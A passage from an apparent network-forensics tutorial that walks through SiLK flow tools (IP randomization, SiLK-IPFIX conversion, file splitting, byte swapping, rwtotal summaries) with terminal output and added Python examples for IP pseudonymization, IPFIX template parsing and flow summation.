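    print("Packet count statistics for sample.pcap")
    for name in ("read", "rejected: too short to get information", "rejected: not IPv4",
                 "total written", "total fragmented packets", "zero-packet of a fragment",
                 "incomplete (no ports and/or flags)"):
        print(f"{stats[name]:>8} {name}")
    for flow in flows:
        print(flow)
```

<div>The counter names are the ones rwptoflow prints above; the reject logic (too short, not IPv4, fragment and incomplete handling) is this example's reading of them, so treat the exact thresholds as an approximation of the tool rather than its source.</div>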
</div><div><br /></div><div><div>Leveraging <b><i>rwrandomizeip </i></b>to randomize IPs.</div><div><br />First, look at the source and destination IPs of the first 5 records in the <i>8.rw</i> file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields=sip,dip --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Now randomize the first 5 records via <b><i>rwrandomizeip</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwrandomizeip 8.rw | rwcut --fields=sip,dip --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 10.255.111.99| 10.39.63.221|</span>
<span style="color: white;"> 10.215.197.155| 10.56.240.34|</span>
<span style="color: white;"> 10.189.217.143| 10.192.119.61|</span>
<span style="color: white;"> 10.12.82.4| 10.251.82.128|</span>
<span style="color: white;"> 10.78.26.161| 10.173.1.103|</span>
</pre></td></tr></tbody></table></div>
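<div><br /></div><div>Notice that in the <b><i>rwrandomizeip</i></b> output above the same real address (8.8.8.8) became a different 10.x.x.x address on every record. When flow data is shared for analysis the property usually wanted is the opposite: the same real address always maps to the same fake address so talkers can still be correlated, while the mapping cannot be reversed without a key. The Python below is an added example (not code from this post or from rwrandomizeip) that does this with HMAC-SHA256 under a secret key, folded into 10.0.0.0/8; the key and the records are constructed sample data that copy the five rwcut rows above.</div>

```python
"""Keyed, consistent IP pseudonymization for flow data that leaves the team.
Added example; not code from the blog post or from rwrandomizeip. HMAC-SHA256 under
a secret key, folded into the target prefix, is this example's own choice of mapping."""
import hashlib
import hmac
from ipaddress import IPv4Address, IPv4Network

SANDBOX = "10.0.0.0/8"   # same target range rwrandomizeip used above


def pseudonymize(ip, key, prefix=SANDBOX):
    """Map one IPv4 address into `prefix`; deterministic for a given key."""
    net = IPv4Network(prefix)
    tag = hmac.new(key, IPv4Address(ip).packed, hashlib.sha256).digest()
    host_bits = net.max_prefixlen - net.prefixlen
    host = int.from_bytes(tag[:4], "big") & ((1 << host_bits) - 1)
    return str(IPv4Address(int(net.network_address) | host))


def pseudonymize_records(records, key, prefix=SANDBOX):
    """Rewrite sip/dip on every record, keeping all other fields untouched."""
    return [dict(r, sip=pseudonymize(r["sip"], key, prefix), dip=pseudonymize(r["dip"], key, prefix))
            for r in records]


def collisions(records, key, prefix=SANDBOX):
    """Real addresses that landed on the same fake address. With 24 host bits this is rare
    but not impossible; check before sharing so two talkers are not silently merged."""
    seen = {}
    for r in records:
        for real in (r["sip"], r["dip"]):
            seen.setdefault(pseudonymize(real, key, prefix), set()).add(real)
    return {fake: reals for fake, reals in seen.items() if len(reals) > 1}


# Constructed records mirroring the rwcut output above: five DNS replies to one client.
SAMPLE_RECORDS = [{"sip": "8.8.8.8", "dip": "172.28.10.137", "proto": 17,
                   "sport": 53, "dport": p} for p in (56213, 55171, 54512, 55359, 54864)]
SAMPLE_KEY = b"constructed-demo-key-rotate-me"   # constructed; a real key comes from a secret store

if __name__ == "__main__":
    for rec in pseudonymize_records(SAMPLE_RECORDS, SAMPLE_KEY):
        print(f"{rec['sip']:>16}|{rec['dip']:>16}| {rec['dport']}")
    print("collisions:", collisions(SAMPLE_RECORDS, SAMPLE_KEY))
```

<div>Because the mapping is keyed, anyone holding the key can recompute which fake address a known real address became, which is exactly what an internal analyst needs and what an outside recipient must not be able to do; keep the key with the same care as the unredacted data.</div>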
</div><div><br /></div><div>Convert SiLK flow data to IPFIX using <b><i>rwsilk2ipfix</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsilk2ipfix 8.rw --ipfix-output rw-2-2ipfix.dat --print-statistics</span></b></span>
<span style="color: white;">rwsilk2ipfix: Wrote 100 IPFIX records to 'rw-2-2ipfix.dat'</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>View a sample of the <b><i>rwsilk2ipfix</i></b> converted data using <b><i>yafscii</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">yafscii --in=rw-2-2ipfix.dat --out=- | more</span></b></span>
<span style="color: white;">2022-02-08 14:26:40.723 - 14:26:40.724 (0.001 sec) udp 8.8.8.8:53 => 172.28.10.137:56213 (1/218 ->)</span>
<span style="color: white;">2022-02-08 14:27:10.329 - 14:27:10.342 (0.013 sec) udp 8.8.8.8:53 => 172.28.10.137:55171 (1/102 ->)</span>
<span style="color: white;">2022-02-08 14:27:43.431 - 14:27:43.433 (0.002 sec) udp 8.8.8.8:53 => 172.28.10.137:54512 (1/213 ->)</span>
<span style="color: white;">2022-02-08 14:28:29.633 - 14:28:29.646 (0.013 sec) udp 8.8.8.8:53 => 172.28.10.137:55359 (1/100 ->)</span>
<span style="color: white;">2022-02-08 14:28:30.328 - 14:28:30.396 (0.068 sec) udp 8.8.8.8:53 => 172.28.10.137:54864 (1/108 ->)</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Taking a different view of the IPFIX record information via <b><i>ipfixDump</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">ipfixDump --yaf --in=rw-2-2ipfix.dat --out=- | more</span></b></span>
<span style="color: white;">--- Message Header ---</span>
<span style="color: white;">export time: 2023-06-15 16:04:04 observation domain id: 0</span>
<span style="color: white;">message length: 952 sequence number: 0 (0)</span>
<span style="color: white;">--- template record ---</span>
<span style="color: white;">header:</span>
<span style="color: white;"> tid: 40404 (0x9dd4) field count: 21 scope: 0</span>
<span style="color: white;">fields:</span>
<span style="color: white;"> ent: 0 id: 152 type: millisec len: 8 flowStartMilliseconds</span>
<span style="color: white;"> ent: 0 id: 153 type: millisec len: 8 flowEndMilliseconds</span>
<span style="color: white;"> ent: 0 id: 2 type: uint64 len: 4 packetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 1 type: uint64 len: 4 octetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 10 type: uint32 len: 2 ingressInterface</span>
<span style="color: white;"> ent: 0 id: 14 type: uint32 len: 2 egressInterface</span>
<span style="color: white;"> ent: 6871 id: 33 type: uint16 len: 2 silkAppLabel</span>
<span style="color: white;"> ent: 6871 id: 31 type: uint16 len: 2 silkFlowSensor</span>
<span style="color: white;"> ent: 6871 id: 30 type: uint8 len: 1 silkFlowType</span>
<span style="color: white;"> ent: 6871 id: 32 type: uint8 len: 1 silkTCPState</span>
<span style="color: white;"> ent: 0 id: 4 type: uint8 len: 1 protocolIdentifier</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 1 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 7 type: uint16 len: 2 sourceTransportPort</span>
<span style="color: white;"> ent: 0 id: 11 type: uint16 len: 2 destinationTransportPort</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 1 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 6 type: uint16 len: 1 tcpControlBits</span>
<span style="color: white;"> ent: 6871 id: 14 type: uint16 len: 1 initialTCPFlags</span>
<span style="color: white;"> ent: 6871 id: 15 type: uint16 len: 1 unionTCPFlags</span>
<span style="color: white;"> ent: 0 id: 8 type: ipv4 len: 4 sourceIPv4Address</span>
<span style="color: white;"> ent: 0 id: 12 type: ipv4 len: 4 destinationIPv4Address</span>
<span style="color: white;"> ent: 0 id: 15 type: ipv4 len: 4 ipNextHopIPv4Address</span>
<span style="color: white;">--- template record ---</span>
<span style="color: white;">header:</span>
<span style="color: white;"> tid: 40657 (0x9ed1) field count: 17 scope: 0</span>
<span style="color: white;">fields:</span>
<span style="color: white;"> ent: 0 id: 152 type: millisec len: 8 flowStartMilliseconds</span>
<span style="color: white;"> ent: 0 id: 153 type: millisec len: 8 flowEndMilliseconds</span>
<span style="color: white;"> ent: 0 id: 2 type: uint64 len: 4 packetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 1 type: uint64 len: 4 octetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 10 type: uint32 len: 2 ingressInterface</span>
<span style="color: white;"> ent: 0 id: 14 type: uint32 len: 2 egressInterface</span>
<span style="color: white;"> ent: 6871 id: 33 type: uint16 len: 2 silkAppLabel</span>
<span style="color: white;"> ent: 6871 id: 31 type: uint16 len: 2 silkFlowSensor</span>
<span style="color: white;"> ent: 6871 id: 30 type: uint8 len: 1 silkFlowType</span>
<span style="color: white;"> ent: 6871 id: 32 type: uint8 len: 1 silkTCPState</span>
<span style="color: white;"> ent: 0 id: 4 type: uint8 len: 1 protocolIdentifier</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 1 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 2 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 139 type: uint16 len: 2 icmpTypeCodeIPv6</span>
<span style="color: white;"> ent: 0 id: 27 type: ipv6 len: 16 sourceIPv6Address</span>
<span style="color: white;"> ent: 0 id: 28 type: ipv6 len: 16 destinationIPv6Address</span>
<span style="color: white;"> ent: 0 id: 62 type: ipv6 len: 16 ipNextHopIPv6Address</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
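<div><br /></div><div>The <b><i>ipfixDump</i></b> output above is a decoded IPFIX template set: each line is one information element with its enterprise number (<i>ent: 0</i> for the IANA registry, <i>ent: 6871</i> for the CERT/NetSA elements such as <i>silkAppLabel</i>), element id and length, and the template id (40404 or 40657) is what later data records refer to. The Python below is an added example (not code from this post, SiLK or YAF) that encodes and decodes such a template set per RFC 7011, showing how enterprise elements travel on the wire: the element id has its high bit set and is followed by a 4-byte enterprise number. <i>TEMPLATE_40404</i> is a constructed subset of the first template's field list above, and the export time is made up.</div>

```python
"""Encode and decode an IPFIX template set (RFC 7011) of the kind ipfixDump printed above.
Added example; not code from the blog post, SiLK or YAF. TEMPLATE_40404 is a constructed
subset of the template 40404 field list in the dump; the export time is made up."""
import struct

IPFIX_VERSION = 10
TEMPLATE_SET_ID = 2
ENTERPRISE_BIT = 0x8000

# (enterprise number, element id, length in bytes, name); 0 = IANA registry, 6871 = CERT/NetSA
TEMPLATE_40404 = [
    (0, 152, 8, "flowStartMilliseconds"), (0, 153, 8, "flowEndMilliseconds"),
    (0, 2, 4, "packetDeltaCount"), (0, 1, 4, "octetDeltaCount"),
    (6871, 33, 2, "silkAppLabel"), (6871, 31, 2, "silkFlowSensor"),
    (0, 4, 1, "protocolIdentifier"), (0, 7, 2, "sourceTransportPort"),
    (0, 11, 2, "destinationTransportPort"), (0, 8, 4, "sourceIPv4Address"),
    (0, 12, 4, "destinationIPv4Address"),
]


def encode_template_message(template_id, fields, export_time, seq=0, domain=0):
    """One IPFIX message holding a single template set with one template record."""
    body = b""
    for ent, eid, length, _name in fields:
        if ent:   # enterprise-specific element: high bit on the id, then the 4-byte PEN
            body += struct.pack("!HHI", eid | ENTERPRISE_BIT, length, ent)
        else:
            body += struct.pack("!HH", eid, length)
    record = struct.pack("!HH", template_id, len(fields)) + body
    set_header = struct.pack("!HH", TEMPLATE_SET_ID, 4 + len(record))
    header = struct.pack("!HHIII", IPFIX_VERSION, 16 + len(set_header) + len(record),
                         export_time, seq, domain)
    return header + set_header + record


def decode_message(data):
    """Parse the message header and every template set; data sets are skipped."""
    version, length, export_time, seq, domain = struct.unpack("!HHIII", data[:16])
    if version != IPFIX_VERSION or length != len(data):
        raise ValueError("not a complete IPFIX message")
    templates, off = {}, 16
    while off + 4 <= length:
        set_id, set_len = struct.unpack("!HH", data[off:off + 4])
        if set_len < 4:
            raise ValueError("set length smaller than its own header")
        end, pos = off + set_len, off + 4
        if set_id == TEMPLATE_SET_ID:
            while pos + 4 <= end:
                tid, count = struct.unpack("!HH", data[pos:pos + 4])
                pos += 4
                if tid == 0:          # zero padding at the end of the set
                    break
                fields = []
                for _ in range(count):
                    eid, flen = struct.unpack("!HH", data[pos:pos + 4])
                    pos += 4
                    ent = 0
                    if eid & ENTERPRISE_BIT:
                        ent = struct.unpack("!I", data[pos:pos + 4])[0]
                        pos += 4
                        eid &= ~ENTERPRISE_BIT & 0xFFFF
                    fields.append((ent, eid, flen))
                templates[tid] = fields
        off = end
    return {"export_time": export_time, "seq": seq, "domain": domain,
            "length": length, "templates": templates}


def record_length(fields):
    """Bytes per data record described by a template (none of these IEs is variable-length)."""
    return sum(flen for _ent, _eid, flen in fields)


if __name__ == "__main__":
    msg = encode_template_message(40404, TEMPLATE_40404, export_time=1_700_000_000)
    parsed = decode_message(msg)
    print(f"message length: {parsed['length']}  templates: {list(parsed['templates'])}")
    for ent, eid, flen in parsed["templates"][40404]:
        print(f"  ent: {ent:<5} id: {eid:<4} len: {flen}")
    print("data record length:", record_length(parsed["templates"][40404]))
```

<div>A collector that receives data records before the template they reference has no way to cut them into fields, which is why rwsilk2ipfix writes the template records first and why a parser should refuse data sets whose template id it has not yet seen.</div>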
</div><div><br /></div><div>Convert the IPFIX file back to SiLK format using <b><i>rwipfix2silk</i></b>. Rather than writing the output to a file, write instead to stdout and use <i><b>rwcut </b></i>to see the values.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwipfix2silk --silk-output=- rw-2-2ipfix.dat | rwcut --fields sip,dip --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Split a flow file into multiple files with <b><i>rwsplit</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsplit --basename=nik_split_ --compression=best --flow-limit=4 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--max-outputs=2 --note-add="Files created with rwsplit" attack-trace.rw</b></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Validate the <b><i>rwsplit</i></b> files were created.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">ls nik_split_.0000000*</span></b></span>
<span style="color: white;">nik_split_.00000000.rwf nik_split_.00000001.rwf</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwfileinfo </i></b>to get information on one of the <b><i>rwsplit </i></b>created files.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo nik_split_.00000001.rwf</span></b></span>
<span style="color: white;">nik_split_.00000001.rwf:</span>
<span style="color: white;"> format(id) FT_RWIPV6ROUTING(0x0c)</span>
<span style="color: white;"> version 16</span>
<span style="color: white;"> byte-order littleEndian</span>
<span style="color: white;"> compression(id) zlib(1)</span>
<span style="color: white;"> header-length 264</span>
<span style="color: white;"> record-length 88</span>
<span style="color: white;"> record-version 1</span>
<span style="color: white;"> silk-version 3.19.2</span>
<span style="color: white;"> count-records 4</span>
<span style="color: white;"> file-size 404</span>
<span style="color: white;"> command-lines</span>
<span style="color: white;"> 1 rwsplit --basename=nik_split_ --compression=best --flow-limit=4 --max-outputs=2 --note-add=Files created with rwsplit attack-trace.rw</span>
<span style="color: white;"> annotations</span>
<span style="color: white;"> 1 Files created with rwsplit</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Changing the byte order of the file with <b><i>rwswapbytes</i></b>.</div><div><br /></div><div>Get the current byte order of the file <i>8.rw</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo 8.rw --fields=byte-order</span></b></span>
<span style="color: white;">8.rw:</span>
<span style="color: white;"> byte-order littleEndian</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Change the byte order to big endian using <b><i>rwswapbytes</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwswapbytes --big-endian \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--note-add="Byte order swapped from little endian" 8.rw 8-swappped.rwf</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Validate the byte order has been changed.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo 8-swappped.rwf --fields=byte-order</span></b></span>
<span style="color: white;">8-swappped.rwf:</span>
<span style="color: white;"> byte-order BigEndian</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Get some totals with <b><i>rwtotal</i></b>, summing by the first 8 bits (the first octet) of the destination IPs.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --summation --skip-zero --dip-first-8</span></b></span>
<span style="color: white;"> dIP_First8| Records| Bytes| Packets|</span>
<span style="color: white;"> 98| 6| 7297| 153|</span>
<span style="color: white;"> 192| 6| 171264| 195|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Instead, look at the first 24 bits (the first three octets) of the source IP.</div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --summation --skip-zero --sip-first-24</span></b></span>
<span style="color: white;">sIP_First24| Records| Bytes| Packets|</span>
<span style="color: white;"> 98.114.205| 6| 171264| 195|</span>
<span style="color: white;">192.150. 11| 6| 7297| 153|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwtotal </i></b>to learn which protocols are seen on the network.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --proto --summation --skip-zero</span></b></span>
<span style="color: white;"> protocol| Records| Bytes| Packets|</span>
<span style="color: white;"> 6| 12| 178561| 348|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Looking at the destination ports, and printing the input file name as well.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --dport --summation --skip-zero --print-filenames</span></b></span>
<span style="color: white;">attack-trace.rw</span>
<span style="color: white;"> dPort| Records| Bytes| Packets|</span>
<span style="color: white;"> 445| 2| 4945| 18|</span>
<span style="color: white;"> 1080| 1| 165088| 159|</span>
<span style="color: white;"> 1821| 1| 128| 3|</span>
<span style="color: white;"> 1828| 1| 1590| 17|</span>
<span style="color: white;"> 1924| 1| 250| 6|</span>
<span style="color: white;"> 1957| 1| 381| 6|</span>
<span style="color: white;"> 2152| 1| 4488| 112|</span>
<span style="color: white;"> 8884| 2| 841| 15|</span>
<span style="color: white;"> 36296| 2| 850| 12|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
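<div><br /></div><div>The four <b><i>rwtotal</i></b> runs above are all the same operation with a different bucket key: the first octet of the destination IP, the first three octets of the source IP, the protocol number, and the destination port, each summing records, bytes and packets and finishing with a TOTALS row. The Python below is an added example (not SiLK code) that reproduces that bucketing for the switches used above plus the other first/last prefix widths rwtotal offers, including the <i>--skip-zero</i> behaviour. <i>SAMPLE_FLOWS</i> is constructed and is not the content of <i>attack-trace.rw</i>.</div>

```python
"""rwtotal-style summation over flow records. Added example; not SiLK code. SAMPLE_FLOWS is
constructed (documentation-range addresses) and is not the content of attack-trace.rw."""

SAMPLE_FLOWS = [  # constructed: two SMB flows, a large transfer to 1080, a DNS flow, an ICMP flow
    {"sip": "192.0.2.10", "dip": "198.51.100.20", "proto": 6, "sport": 1821, "dport": 445, "bytes": 4945, "packets": 18},
    {"sip": "192.0.2.10", "dip": "198.51.100.20", "proto": 6, "sport": 1822, "dport": 445, "bytes": 900, "packets": 6},
    {"sip": "198.51.100.20", "dip": "192.0.2.10", "proto": 6, "sport": 36296, "dport": 1080, "bytes": 165088, "packets": 159},
    {"sip": "198.51.100.20", "dip": "192.0.2.10", "proto": 17, "sport": 53, "dport": 53, "bytes": 120, "packets": 1},
    {"sip": "203.0.113.7", "dip": "192.0.2.10", "proto": 1, "sport": 0, "dport": 0, "bytes": 84, "packets": 1},
]

# key name -> (record field, number of octets kept, keep leading or trailing octets)
KEY_SPECS = {
    "sip-first-8": ("sip", 1, "first"), "sip-first-16": ("sip", 2, "first"),
    "sip-first-24": ("sip", 3, "first"), "sip-last-8": ("sip", 1, "last"),
    "sip-last-16": ("sip", 2, "last"),
    "dip-first-8": ("dip", 1, "first"), "dip-first-16": ("dip", 2, "first"),
    "dip-first-24": ("dip", 3, "first"), "dip-last-8": ("dip", 1, "last"),
    "dip-last-16": ("dip", 2, "last"),
    "sport": ("sport", None, None), "dport": ("dport", None, None),
    "proto": ("proto", None, None),
}


def bucket(flow, key):
    """Sortable bucket key for one flow: a tuple of octets for IP keys, an int otherwise."""
    field, octets, side = KEY_SPECS[key]
    if octets is None:
        return flow[field]
    parts = [int(p) for p in flow[field].split(".")]
    return tuple(parts[:octets] if side == "first" else parts[-octets:])


def label(value):
    """Dotted octets for IP prefixes (as rwtotal prints '98.114.205'), plain number otherwise."""
    return ".".join(str(v) for v in value) if isinstance(value, tuple) else str(value)


def rwtotal(flows, key, skip_zero=True):
    """Return (rows, totals); rows are (label, records, bytes, packets) ordered by key value."""
    table = {}
    for f in flows:
        rec = table.setdefault(bucket(f, key), [0, 0, 0])
        rec[0] += 1
        rec[1] += f["bytes"]
        rec[2] += f["packets"]
    if not skip_zero:   # without --skip-zero rwtotal prints every possible bucket, even empty ones
        field, octets, _ = KEY_SPECS[key]
        if octets not in (None, 1):
            raise ValueError("16/24-bit prefix keys produce millions of rows; use skip_zero=True")
        width = 65536 if field in ("sport", "dport") else 256
        for v in range(width):
            table.setdefault(v if octets is None else (v,), [0, 0, 0])
    rows = [(label(k), *table[k]) for k in sorted(table)]
    totals = ("TOTALS", sum(r[1] for r in rows), sum(r[2] for r in rows), sum(r[3] for r in rows))
    return rows, totals


def print_table(rows, totals, key):
    head = {"proto": "protocol", "dport": "dPort", "sport": "sPort"}.get(key, key)
    print(f"{head:>12}| Records| Bytes| Packets|")
    for row in rows + [totals]:
        print(f"{row[0]:>12}|{row[1]:>8}|{row[2]:>10}|{row[3]:>8}|")


if __name__ == "__main__":
    for key in ("dip-first-8", "sip-first-24", "proto", "dport"):
        print_table(*rwtotal(SAMPLE_FLOWS, key), key)
        print()
```

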